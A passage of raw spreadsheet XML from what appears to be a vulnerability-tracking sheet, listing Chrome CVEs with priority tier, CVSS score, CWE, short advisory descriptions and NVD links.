          <t>Incomplete cleanup in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4096" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87446</t>
        </is>
      </c>
    </row>
    <row r="4097">
      <c r="A4097" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4097" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87447</t>
        </is>
      </c>
      <c r="C4097" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4097" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4097" s="5" t="inlineStr"/>
      <c r="F4097" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4097" s="5" t="inlineStr"/>
      <c r="H4097" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4097" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4097" s="5" t="inlineStr"/>
      <c r="K4097" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4097" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Network in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted Chrome extension. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M4097" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87447</t>
        </is>
      </c>
    </row>
    <row r="4098">
      <c r="A4098" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4098" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87454</t>
        </is>
      </c>
      <c r="C4098" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4098" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4098" s="5" t="inlineStr"/>
      <c r="F4098" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4098" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4098" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I4098" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4098" s="5" t="inlineStr"/>
      <c r="K4098" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L4098" s="5" t="inlineStr">
        <is>
          <t>Information leak in Enterprise in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4098" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87454</t>
        </is>
      </c>
    </row>
    <row r="4099">
      <c r="A4099" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4099" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87459</t>
        </is>
      </c>
      <c r="C4099" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4099" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4099" s="5" t="inlineStr"/>
      <c r="F4099" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4099" s="5" t="inlineStr"/>
      <c r="H4099" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4099" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4099" s="5" t="inlineStr"/>
      <c r="K4099" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="L4099" s="5" t="inlineStr">
        <is>
          <t>Observable discrepancy in Select in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M4099" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87459</t>
        </is>
      </c>
    </row>
    <row r="4100">
      <c r="A4100" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87468</t>
        </is>
      </c>
      <c r="C4100" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4100" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4100" s="5" t="inlineStr"/>
      <c r="F4100" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4100" s="5" t="inlineStr"/>
      <c r="H4100" s="5" t="inlineStr"/>
      <c r="I4100" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4100" s="5" t="inlineStr"/>
      <c r="K4100" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4100" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Isolated in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87468</t>
        </is>
      </c>
    </row>
    <row r="4101">
      <c r="A4101" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87475</t>
        </is>
      </c>
      <c r="C4101" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4101" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4101" s="5" t="inlineStr"/>
      <c r="F4101" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4101" s="5" t="inlineStr"/>
      <c r="H4101" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4101" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4101" s="5" t="inlineStr"/>
      <c r="K4101" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4101" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Omnibox in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions into a privileged page via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87475</t>
        </is>
      </c>
    </row>
    <row r="4102">
      <c r="A4102" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87476</t>
        </is>
      </c>
      <c r="C4102" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4102" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4102" s="5" t="inlineStr"/>
      <c r="F4102" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4102" s="5" t="inlineStr"/>
      <c r="H4102" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4102" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4102" s="5" t="inlineStr"/>
      <c r="K4102" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4102" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Loader in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87476</t>
        </is>
      </c>
    </row>
    <row r="4103">
      <c r="A4103" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87477</t>
        </is>
      </c>
      <c r="C4103" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4103" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4103" s="5" t="inlineStr"/>
      <c r="F4103" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4103" s="5" t="inlineStr"/>
      <c r="H4103" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4103" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4103" s="5" t="inlineStr"/>
      <c r="K4103" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L4103" s="5" t="inlineStr">
        <is>
          <t>Information leak in Core in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to leak sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M4103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87477</t>
        </is>
      </c>
    </row>
    <row r="4104">
      <c r="A4104" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87478</t>
        </is>
      </c>
      <c r="C4104" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4104" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4104" s="5" t="inlineStr"/>
      <c r="F4104" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4104" s="5" t="inlineStr"/>
      <c r="H4104" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4104" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4104" s="5" t="inlineStr"/>
      <c r="K4104" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="L4104" s="5" t="inlineStr">
        <is>
          <t>Observable discrepancy in Autofill in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87478</t>
        </is>
      </c>
    </row>
    <row r="4105">
      <c r="A4105" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87483</t>
        </is>
      </c>
      <c r="C4105" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4105" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4105" s="5" t="inlineStr"/>
      <c r="F4105" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4105" s="5" t="inlineStr"/>
      <c r="H4105" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I4105" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4105" s="5" t="inlineStr"/>
      <c r="K4105" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4105" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Browser in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87483</t>
        </is>
      </c>
    </row>
    <row r="4106">
      <c r="A4106" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87490</t>
        </is>
      </c>
      <c r="C4106" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4106" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4106" s="5" t="inlineStr"/>
      <c r="F4106" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4106" s="5" t="inlineStr"/>
      <c r="H4106" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4106" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4106" s="5" t="inlineStr"/>
      <c r="K4106" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L4106" s="5" t="inlineStr">
        <is>
          <t>Information leak in Transactions Platform in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M4106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87490</t>
        </is>
      </c>
    </row>
    <row r="4107">
      <c r="A4107" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87493</t>
        </is>
      </c>
      <c r="C4107" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4107" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4107" s="5" t="inlineStr"/>
      <c r="F4107" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4107" s="5" t="inlineStr"/>
      <c r="H4107" s="5" t="inlineStr"/>
      <c r="I4107" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4107" s="5" t="inlineStr"/>
      <c r="K4107" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4107" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87493</t>
        </is>
      </c>
    </row>
    <row r="4108">
      <c r="A4108" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87503</t>
        </is>
      </c>
      <c r="C4108" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4108" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4108" s="5" t="inlineStr"/>
      <c r="F4108" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4108" s="5" t="inlineStr"/>
      <c r="H4108" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I4108" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4108" s="5" t="inlineStr"/>
      <c r="K4108" s="5" t="inlineStr">
        <is>
          <t>CWE-841</t>
        </is>
      </c>
      <c r="L4108" s="5" t="inlineStr">
        <is>
          <t>Inappropriate implementation in Downloads in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87503</t>
        </is>
      </c>
    </row>
    <row r="4109">
      <c r="A4109" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87513</t>
        </is>
      </c>
      <c r="C4109" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4109" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4109" s="5" t="inlineStr"/>
      <c r="F4109" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4109" s="5" t="inlineStr"/>
      <c r="H4109" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4109" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4109" s="5" t="inlineStr"/>
      <c r="K4109" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4109" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in ControlledFrame in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87513</t>
        </is>
      </c>
    </row>
    <row r="4110">
      <c r="A4110" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87515</t>
        </is>
      </c>
      <c r="C4110" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4110" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4110" s="5" t="inlineStr"/>
      <c r="F4110" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4110" s="5" t="inlineStr"/>
      <c r="H4110" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4110" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4110" s="5" t="inlineStr"/>
      <c r="K4110" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4110" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in FileAPI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87515</t>
        </is>
      </c>
    </row>
    <row r="4111">
      <c r="A4111" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87519</t>
        </is>
      </c>
      <c r="C4111" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4111" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4111" s="5" t="inlineStr"/>
      <c r="F4111" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4111" s="5" t="inlineStr"/>
      <c r="H4111" s="5" t="inlineStr"/>
      <c r="I4111" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4111" s="5" t="inlineStr"/>
      <c r="K4111" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4111" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Safebrowsing in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M4111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87519</t>
        </is>
      </c>
    </row>
    <row r="4112">
      <c r="A4112" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87522</t>
        </is>
      </c>
      <c r="C4112" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4112" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4112" s="5" t="inlineStr"/>
      <c r="F4112" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4112" s="5" t="inlineStr"/>
      <c r="H4112" s="5" t="inlineStr"/>
      <c r="I4112" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4112" s="5" t="inlineStr"/>
      <c r="K4112" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4112" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in WebView in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to potentially bypass system access restrictions via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M4112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87522</t>
        </is>
      </c>
    </row>
    <row r="4113">
      <c r="A4113" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87532</t>
        </is>
      </c>
      <c r="C4113" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4113" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4113" s="5" t="inlineStr"/>
      <c r="F4113" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4113" s="5" t="inlineStr"/>
      <c r="H4113" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4113" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4113" s="5" t="inlineStr"/>
      <c r="K4113" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="L4113" s="5" t="inlineStr">
        <is>
          <t>Improper state validation in Safebrowsing in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87532</t>
        </is>
      </c>
    </row>
    <row r="4114">
      <c r="A4114" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87535</t>
        </is>
      </c>
      <c r="C4114" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4114" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4114" s="5" t="inlineStr"/>
      <c r="F4114" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4114" s="5" t="inlineStr"/>
      <c r="H4114" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="I4114" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4114" s="5" t="inlineStr"/>
      <c r="K4114" s="5" t="inlineStr">
        <is>
          <t>CWE-221</t>
        </is>
      </c>
      <c r="L4114" s="5" t="inlineStr">
        <is>
          <t>Information loss or omission in Safebrowsing in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87535</t>
        </is>
      </c>
    </row>
    <row r="4115">
      <c r="A4115" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87541</t>
        </is>
      </c>
      <c r="C4115" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4115" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4115" s="5" t="inlineStr"/>
      <c r="F4115" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4115" s="5" t="inlineStr"/>
      <c r="H4115" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4115" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4115" s="5" t="inlineStr"/>
      <c r="K4115" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L4115" s="5" t="inlineStr">
        <is>
          <t>Information leak in Navigation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87541</t>
        </is>
      </c>
    </row>
    <row r="4116">
      <c r="A4116" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87545</t>
        </is>
      </c>
      <c r="C4116" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4116" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4116" s="5" t="inlineStr"/>
      <c r="F4116" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4116" s="5" t="inlineStr"/>
      <c r="H4116" s="5" t="inlineStr">
        <is>
          <t>apple:iphone_os, google:chrome</t>
        </is>
      </c>
      <c r="I4116" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4116" s="5" t="inlineStr"/>
      <c r="K4116" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L4116" s="5" t="inlineStr">
        <is>
          <t>Information leak in Mobile in Google Chrome on on iOS prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to leak sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M4116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87545</t>
        </is>
      </c>
    </row>
    <row r="4117">
      <c r="A4117" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87549</t>
        </is>
      </c>
      <c r="C4117" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4117" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4117" s="5" t="inlineStr"/>
      <c r="F4117" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4117" s="5" t="inlineStr"/>
      <c r="H4117" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I4117" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4117" s="5" t="inlineStr"/>
      <c r="K4117" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="L4117" s="5" t="inlineStr">
        <is>
          <t>Incomplete cleanup in Downloads in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M4117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87549</t>
        </is>
      </c>
    </row>
    <row r="4118">
      <c r="A4118" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87565</t>
        </is>
      </c>
      <c r="C4118" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4118" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4118" s="5" t="inlineStr"/>
      <c r="F4118" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4118" s="5" t="inlineStr"/>
      <c r="H4118" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I4118" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4118" s="5" t="inlineStr"/>
      <c r="K4118" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L4118" s="5" t="inlineStr">
        <is>
          <t>Information leak in Passwords in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to leak sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M4118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87565</t>
        </is>
      </c>
    </row>
    <row r="4119">
      <c r="A4119" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87580</t>
        </is>
      </c>
      <c r="C4119" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4119" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4119" s="5" t="inlineStr"/>
      <c r="F4119" s="5" t="n">
        <v>0.002</v>
      </c>
